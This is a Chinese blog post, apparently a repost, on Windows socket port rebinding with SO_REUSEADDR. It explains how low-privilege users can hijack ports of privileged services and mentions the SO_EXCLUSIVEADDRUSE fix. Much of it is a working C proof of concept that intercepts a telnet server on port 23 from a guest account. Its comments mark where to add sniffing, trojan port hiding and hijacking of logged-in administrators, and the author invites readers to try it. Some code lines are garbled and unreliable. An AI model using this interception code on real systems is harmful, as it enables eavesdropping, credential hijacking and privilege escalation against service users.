SOCKET端口复用

最新推荐文章于 2023-05-24 18:41:46 发布
最新推荐文章于 2023-05-24 18:41:46 发布
阅读量4.9k 收藏 3
点赞数
分类专栏: 网络技术 文章标签: socket 服务器 stream 编程 web服务 tcp

在WINDOWS的SOCKET服务器应用的编程中,如下的语句或许比比都是:
s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = htonl(INADDR_ANY);
bind(s,(SOCKADDR *)=saddr,sizeof(saddr));
其实这当中存在在非常大的安全隐患,因为在winsock的实现中,对于服务器的绑定是可以多重绑定的,在确定多重绑定使用谁的时候,根据一条原则是谁的指定最明确则将包递交给谁,而且没有权限之分,也就是说低级权限的用户是可以重绑定在高级权限如服务启动的端口上的,这是非常重大的一个安全隐患。
这意味着什么?意味着可以进行如下的攻击:
1。一个木马绑定到一个已经合法存在的端口上进行端口的隐藏,他通过自己特定的包格式判断是不是自己的包,如果是自己处理,如果不是通过127.0.0.1的地址交给真正的服务器应用进行处理。
2。一个木马可以在低权限用户上绑定高权限的服务应用的端口,进行该处理信息的嗅探,本来在一个主机上监听一个SOCKET的通讯需要具备非常高的权限要求,但其实利用SOCKET重绑定,你可以轻易的监听具备这种SOCKET编程漏洞的通讯,而无须采用什么挂接,钩子或低层的驱动技术(这些都需要具备管理员权限才能达到)
3。针对一些的特殊应用,可以发起中间人攻击,从低权限用户上获得信息或事实欺骗,如在guest权限下拦截telnet服务器的23端口,如果是采用NTLM加密认证,虽然你无法通过嗅探直接获取密码,但一旦有admin用户通过你登陆以后,你的应用就完全可以发起中间人攻击,扮演这个登陆的用户通过SOCKET发送高权限的命令,到达入侵的目的。
4.对于构建的WEB服务器,入侵者只需要获得低级的权限,就可以完全达到更改网页目的,很简单,扮演你的服务器给予连接请求以其它信息的应答,甚至是基于电子商务上的欺骗,获取非法的数据。 
其实,MS自己的很多服务的SOCKET编程都存在这样的问题,telnet,ftp,http的服务实现全部都可以利用这种方法进行攻击,在低权限用户上实现对SYSTEM应用的截听。包括W2K+SP3的IIS也都一样,那么如果你已经可以以低权限用户入侵或木马植入的话,而且对方又开启了这些服务的话,那就不妨一试。并且我估计还有很多第三方的服务也大多存在这个漏洞。
解决的方法很简单,在编写如上应用的时候,绑定前需要使用setsockopt指定SO_EXCLUSIVEADDRUSE要求独占所有的端口地址,而不允许复用。这样其它人就无法复用这个端口了。
下面就是一个简单的截听ms telnet服务器的例子,在GUEST用户下都能成功进行截听,剩余的就是大家根据自己的需要,进行一些特殊剪裁的问题了:如是隐藏,嗅探数据,高权限用户欺骗等。

 

  2. DWORD WINAPI ClientThread(LPVOID lpParam); 
  4. int main() 
  6.  WORD wVersionRequested; 
  7.  DWORD ret; 
  8.  WSADATA wsaData; 
  9.  BOOL val; 
  10.  SOCKADDR_IN saddr; 
  11.  SOCKADDR_IN scaddr; 
  12.  int err; 
  13.  SOCKET s; 
  14.  SOCKET sc; 
  15.  int caddsize; 
  16.  HANDLE mt; 
  17.  DWORD tid; 
  18.  wVersionRequested = MAKEWORD( 2, 2 ); 
  19.  err = WSAStartup( wVersionRequested, =wsaData ); 
  20.  if ( err != 0 ) { 
  21.   printf("error!WSAStartup failed!/n"); 
  22.   return -1; 
  23.  } 
  24.  saddr.sin_family = AF_INET; 
  25.  //截听虽然也可以将地址指定为INADDR_ANY,但是要不能影响正常应用情况下,应该指定具体的IP,留下127.0.0.1给正常的服务应用,然后利用这个地址进行转发,就可以不影响对方正常应用了 
  26.  saddr.sin_addr.s_addr = inet_addr("192.168.0.60"); 
  27.  saddr.sin_port = htons(23);
  28.  if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)  
  29.  {
  30.   printf("error!socket failed!/n");  
  31.   return -1; 
  32.  } 
  33.  val = TRUE; 
  34.  //SO_REUSEADDR选项就是可以实现端口重绑定的 
  35.  if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char *)=val,sizeof(val))!=0) 
  36.  { 
  37.   printf("error!setsockopt failed!/n"); 
  38.   return -1; 
  39.  } 
  40.  //如果指定了SO_EXCLUSIVEADDRUSE,就不会绑定成功,返回无权限的错误代码; 
  41.  //如果是想通过重利用端口达到隐藏的目的,就可以动态的测试当前已绑定的端口哪个可以成功,就说明具备这个漏洞,然后动态利用端口使得更隐蔽 
  42.  //其实UDP端口一样可以这样重绑定利用,这儿主要是以TELNET服务为例子进行攻击 
  43.  if(bind(s,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR) 
  44.  { 
  45.   ret=GetLastError(); 
  46.   printf("error!bind failed!/n"); 
  47.   return -1; 
  48.  } 
  49.  listen(s,2); 
  50.  while(1) 
  51.  { 
  52.   caddsize = sizeof(scaddr); 
  53.   //接受连接请求 
  54.   sc = accept(s,(struct sockaddr *&scaddr,&caddsize); 
  55.   if(sc!=INVALID_SOCKET) 
  56.   { 
  57.    mt = CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,&tid); 
  58.    if(mt==NULL) 
  59.    { 
  60.     printf("Thread Creat Failed!/n"); 
  61.     break
  62.    } 
  63.   } 
  64.   CloseHandle(mt); 
  65.  } 
  66.  closesocket(s); 
  67.  WSACleanup(); 
  68.  return 0; 
  71. DWORD WINAPI ClientThread(LPVOID lpParam) 
  73.  SOCKET ss = (SOCKET)lpParam; 
  74.  SOCKET sc; 
  75.  unsigned char buf[4096]; 
  76.  SOCKADDR_IN saddr; 
  77.  long num; 
  78.  DWORD val; 
  79.  DWORD ret; 
  80.  //如果是隐藏端口应用的话,可以在此处加一些判断 
  81.  //如果是自己的包,就可以进行一些特殊处理,不是的话通过127.0.0.1进行转发 
  82.  saddr.sin_family = AF_INET; 
  83.  saddr.sin_addr.s_addr = inet_addr("127.0.0.1"); 
  84.   saddr.sin_port = htons(23); 
  85.   if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR) 
  86.  { 
  87.    printf("error!socket failed!/n"); 
  88.   return -1; 
  89.  } 
  90.  val = 100; 
  91.  if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0) 
  92.  { 
  93.   ret = GetLastError(); 
  94.   return -1; 
  95.  } 
  96.  if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0) 
  97.  { 
  98.   ret = GetLastError(); 
  99.   return -1;   
  100.  } 
  101.  if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))!=0) 
  102.  { 
  103.   printf("error!socket connect failed!/n"); 
  104.   closesocket(sc); 
  105.   closesocket(ss); 
  106.   return -1; 
  107.  } 
  108.  while(1) 
  109.  { 
  110.   //下面的代码主要是实现通过127.0.0.1这个地址把包转发到真正的应用上,并把应答的包再转发回去。 
  111.   //如果是嗅探内容的话,可以再此处进行内容分析和记录 
  112.   //如果是攻击如TELNET服务器,利用其高权限登陆用户的话,可以分析其登陆用户,然后利用发送特定的包以劫持的用户身份执行。 
  113.   num = recv(ss,buf,4096,0); 
  114.   if(num>0) 
  115.    send(sc,buf,num,0); 
  116.   else if(num==0) 
  117.    break
  118.   num = recv(sc,buf,4096,0); 
  119.   if(num>0) 
  120.    send(ss,buf,num,0); 
  121.   else if(num==0) 
  122.    break
  123.  } 
  124.  closesocket(ss); 
  125.  closesocket(sc); 
  126.  return 0 ; 
白錵錵
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java socket 端口复用_Socket端口复用【转】
weixin_39897749的博客
02-16 912
一、什么是端口复用:因为在winsock的实现中,对于服务器的绑定是可以多重绑定的,在确定多重绑定使用谁的时候,根据一条原则是谁的指定最明确则将包递交给谁,而且没有权限之分。这种多重绑定便称之为端口复用。二、我们如何实现Socket端口复用:其实我们要实现端口复用很简单,我们只要使用SetSocketOption函数设置Socket选项就可以了。MSDN是这样解释的:Socket 选项确定当前 S...
TCP端口复用
蜜汁程序员的博客
10-31 9963
  TCP端口复用 用于TCP穿透之中。 为了验证真实性,写了一个小例子。 试验了一个端口是否可以同时进行监听接收和发送 ,创建了四个进程。 原理: 1.设置::setsockopt(accept_fd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof (opt)); 2.  ::setsockopt(accept_fd, SOL_SOCKET, ...
Socket端口复用
01-08
实现TCP/IP端口重复使用 To achieve TCP / IP port re-use
端口截听实现端口隐藏,嗅探与攻击
uuty的专栏
10-15 1107
创建时间:2002-11-05文章属性:原创文章提交:flashsky (flashsky1_at_sina.com)作者:FLASHSKYEMAIL:flashsky@xfocus.org站点:www.xfocus.net  www.shopsky.com转载请注明原作者安全焦点在WINDOWS的SOCKET服务器应用的编程中,如下的语句或许比比都是:       s=socket(AF_INE
在C#中实现Socket端口复用
weixin_30906425的博客
05-22 364
一、什么是端口复用:   因为在winsock的实现中,对于服务器的绑定是可以多重绑定的,在确定多重绑定使用谁的时候,根据一条原则是谁的指定最明确则将包递交给谁,而且没有权限之分。这种多重绑定便称之为端口复用。 二、我们如何实现Socket端口复用:   其实我们要实现端口复用很简单,我们只要使用SetSocketOption函数设置Socket选项就可以了。MSDN是这样解释的:Socke...
一个简单的Windows Socket复用框架
weixin_33906657的博客
07-28 180
一个简单的Windows Socket复用框架   说起网络编程,无非是建立连接,发送数据,接收数据,关闭连接。曾经学习网络编程的时候用Java写了一些小的聊天程序,Java对网络接口函数的封装还是很简单实用的,但是在Windows下网络编程使用的Socket就显得稍微有点繁琐。这里介绍一个自己封装的一个简单的基于Windows Socket的一个框架代码,主要目的是为了方便使用Window...
socket 端口和地址复用
hanhan的博客
10-30 4692
参考: https://blog.csdn.net/weibo1230123/article/details/79978745 https://blog.csdn.net/weixin_42157432/article/details/115560824 在linux socket网络编程中,大规模并发TCP或UDP连接时,经常会用到端口复用: int opt = 1; if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (const void *) &
socket端口复用
03-07
### Socket端口复用详解 #### 一、端口复用的概念 端口复用(Port Reuse)是指在一个系统中允许多个网络服务绑定到同一个端口的技术。这种技术通常用于解决服务重启过程中遇到的问题,例如服务端口被占用或未能...
java多进程端口复用_多个程序监听同一端口 - socket端口复用技术
weixin_31822733的博客
03-08 630
对于多个程序绑定同一个端口我们遇到最多的是(Port 80 was already in use),也就是说端口被占用,不能重复绑定,但是操作系统内核支持通过配置socket参数的方式来实现多个进程绑定同一个端口。简单示例package mainimport ("context""golang.org/x/sys/windows""net""syscall")var listenConfig = ...
socket 多路复用
03-27
socket accept 多路复用socket accept 多路复用socket accept 多路复用
socket 端口复用 linux,socket 端口复用
weixin_39999859的博客
05-08 295
背景默认的情况下,如果一个网络应用程序的一个套接字 绑定了一个端口(例如888),这时候,别的套接字就无法使用这个端口( 888 )#include #include #include #include #include #include #include int main(int argc, char *argv[]){int sockfd_one;int err_log;sockfd_one ...
java socket 端口复用_Java TCP/IP协议的Socket如何设置端口复用
weixin_30521175的博客
02-24 696
Java TCP/IP协议的Socket如何设置端口复用?关注:123答案:3mip版解决时间 2021-01-30 18:33提问者情婲、毒2021-01-29 18:58情境如下:1). 使用new Socket(ServerAddress, ServerPort, ClientAddress, ClientPort);绑定端口建立连接后,Client端发送“end”信息至Server...
关于socket的地址复用端口复用技术与UDP并发
yuanshenqiang的博客
05-24 2813
可以看作是内核级负载均衡。观察上述代码,可以注意到,当获知了客户端的源端口和源ip后,会将新udp socket连接到该客户端(执行了connect操作),这样一来,新的udp socket五元组就唯一确定了,下一次该客户端再发数据包,就会直接找到这个新的udp socket,放到指定缓冲区,而不会随机分配了。socket是系统级资源(区别于进程级和线程级,在本机上是全局唯一的),可以人为绑定本地ip和端口,与协议类型,对端ip,对端端口一起,作为该socket在本机上的唯一标识。
socket多路复用
weixin_53331739的博客
08-11 1859
socket多路复用
网络socket编程--多路复用
King_的博客
02-19 1797
一、五种网络I/O模型 1.什么是I/O IO在计算机中指Input/Output,也就是输入和输出。由于程序和运行时数据是在内存中驻留,由CPU这个超快的计算核心来执行,涉及到数据交换的地方,通常是磁盘、网络等,就需要IO接口。 比如你打开浏览器,访问新浪首页,浏览器这个程序就需要通过网络IO获取新浪的网页。浏览器首先会发送数据给新浪服务器,告诉它我想要首页的HTML,这个动作是往外发数据,叫Output,随后新浪服务器把网页发过来,这个动作是从外面接收数据,叫Input。所以,通常,程序完成IO操作会有
实现端口复用的方法及应用场景
qq_46017342的博客
05-12 2887
实现端口复用的方法及应用场景
VS2010 设置socket端口复用
最新发布
05-30
要在 VS2010 中设置 socket 端口复用,可以按照以下步骤进行操作: 1. 打开项目,进入“解决方案资源管理器”。 2. 右键单击项目,选择“属性”。 3. 在“属性页”中,选择“配置属性” -> “C/C++” -> “预处理器”。 4. 在“预处理器定义”中添加宏“_WINSOCK_DEPRECATED_NO_WARNINGS”。 5. 然后,选择“配置属性” -> “链接器” -> “输入”。 6. 在“附加依赖项”中添加“ws2_32.lib”。 7. 最后,编写代码时,使用以下代码启用 socket 端口复用: ``` int opt = 1; setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (char*)&opt, sizeof(opt)); ``` 其中,sock 表示 socket 句柄,opt 表示启用端口复用的选项。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值